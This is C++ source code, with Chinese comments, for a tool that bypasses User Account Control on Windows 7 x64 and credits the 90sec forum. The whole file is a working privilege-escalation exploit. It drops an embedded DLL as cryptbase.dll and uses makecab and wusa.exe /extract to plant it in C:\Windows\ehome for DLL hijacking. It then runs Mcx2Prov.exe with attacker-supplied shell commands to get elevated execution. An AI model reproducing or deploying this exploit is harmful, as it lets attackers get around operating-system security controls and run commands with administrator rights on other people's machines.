WIN7 X64 PASSUAC 源码

// Passuac.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include  <direct.h>

BOOL IsUserInAdminGroup() //判断是否在管理员组
{
BOOL fInAdminGroup = FALSE;
HANDLE hToken = NULL;
HANDLE hTokenToCheck = NULL;
DWORD cbSize = 0;

OSVERSIONINFO osver = {0};
osver.dwOSVersionInfoSize = sizeof(osver);

if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_DUPLICATE, &hToken))
goto Cleanup;
if (!GetVersionEx(&osver))
goto Cleanup;
if (osver.dwMajorVersion >= 6)
{
TOKEN_ELEVATION_TYPE elevType;
if (!GetTokenInformation(hToken, TokenElevationType, &elevType, sizeof(elevType), &cbSize))
goto Cleanup;
if (TokenElevationTypeLimited == elevType)
{
if (!GetTokenInformation(hToken, TokenLinkedToken, &hTokenToCheck, sizeof(hTokenToCheck), &cbSize))
goto Cleanup;
}
}

if (!hTokenToCheck)
{
if (!DuplicateToken(hToken, SecurityIdentification, &hTokenToCheck))
goto Cleanup;
}

BYTE adminSID[SECURITY_MAX_SID_SIZE];
cbSize = sizeof(adminSID);
if (!CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, &adminSID, &cbSize))
goto Cleanup;
if (!CheckTokenMembership(hTokenToCheck, &adminSID, &fInAdminGroup))
goto Cleanup;

Cleanup:
if (hToken)    CloseHandle(hToken);
if (hTokenToCheck) CloseHandle(hTokenToCheck);
return fInAdminGroup;
}

BOOL IsRunAsAdmin() //判断是否以管理员权限运行
{
BOOL fIsRunAsAdmin = FALSE;
DWORD dwError = ERROR_SUCCESS;
PSID pAdministratorsGroup = NULL;

SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
if (!AllocateAndInitializeSid(
&NtAuthority,
2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
&pAdministratorsGroup))
{
dwError = GetLastError();
goto Cleanup;
}

if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin))
{
dwError = GetLastError();
goto Cleanup;
}

Cleanup:
if (pAdministratorsGroup) FreeSid(pAdministratorsGroup);
return fIsRunAsAdmin;
}

BOOL writedll64()
{

char Szpath[MAX_PATH] = {0};
char uacexqute[1024] = {0};
DWORD   dwWrite=0;
WORD wResID;
HANDLE  hFile = CreateFileA("cryptbase.dll",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
printf("Getlasterror:%d.\r\n",GetLastError());
return 0;
}
HRSRC hrsc = FindResource(NULL,MAKEINTRESOURCE(IDR_TESTDLL1),L"TESTDLL");
HGLOBAL hG = LoadResource(NULL, hrsc);
DWORD   dwSize = SizeofResource( NULL,  hrsc);

WriteFile(hFile,hG,dwSize,&dwWrite,NULL);
CloseHandle( hFile );

getcwd(Szpath, MAX_PATH);
strcat(Szpath,"\\cryptbase.tmp");
system("makecab cryptbase.dll cryptbase.tmp");
sprintf(uacexqute,"%s /extract:C:\\Windows\\ehome\\",Szpath);

ShellExecuteA(NULL, "open", "wusa.exe", uacexqute, NULL, SW_HIDE);

//remove("cryptbase*");
DeleteFileA("cryptbase.dll");
DeleteFileA("cryptbase.tmp");

return true;
}

int main(int argc,char* argv[])
{
FILE* fp;
char szcmd[1024] = {0};
char *Options;
char buffer[2048] = {0};
STARTUPINFO si={sizeof(si)};
PROCESS_INFORMATION pi;
si.dwFlags=STARTF_USESHOWWINDOW;
si.wShowWindow=TRUE;

if (argc < 2)
{
printf("[*]:%s Passuac for windows 7 x64\n",argv[0]);
printf("[*]:%s Setp1: passuac\r\n",argv[0]);
printf("[*]:%s Setp2: shell_cmd\r\n",argv[0]);
printf("[*]:Welcome to www.90sec.org\r\n");
printf("[*]:Pass uac t00ls By:@90sec\r\n\r\n");
return 0;
}

strcpy(szcmd,argv[1]);

char szNewCmd[MAX_PATH] = {0};
wsprintfA(szNewCmd, "\"%s\"", szcmd);

if (!IsUserInAdminGroup())
{
printf("Your not have in Local Administrator Group\r\n");
printf("Program exit;");
exit(1);
}else
{
printf("Your have in Local Administrator Group\r\n");
printf("PassUac ing.....\r\n");
if (!IsRunAsAdmin())
{
if (!strcmp(szcmd,"passuac"))
{
writedll64();
}else
{

ShellExecuteA(NULL, "open", "C:\\windows\\ehome\\Mcx2Prov.exe", szNewCmd, NULL, SW_HIDE);
Sleep(4000);

fp = fopen("c:\\programdata\\uac.txt","rb");
if (fp == NULL)
{
printf("Getlasterror:%d\r\n",GetLastError());
return 0;
}

ZeroMemory(buffer,sizeof(buffer));

while (fgets(buffer,sizeof(buffer),fp))
{
printf(buffer);
}
fclose(fp);
}
}
}
return 0;
}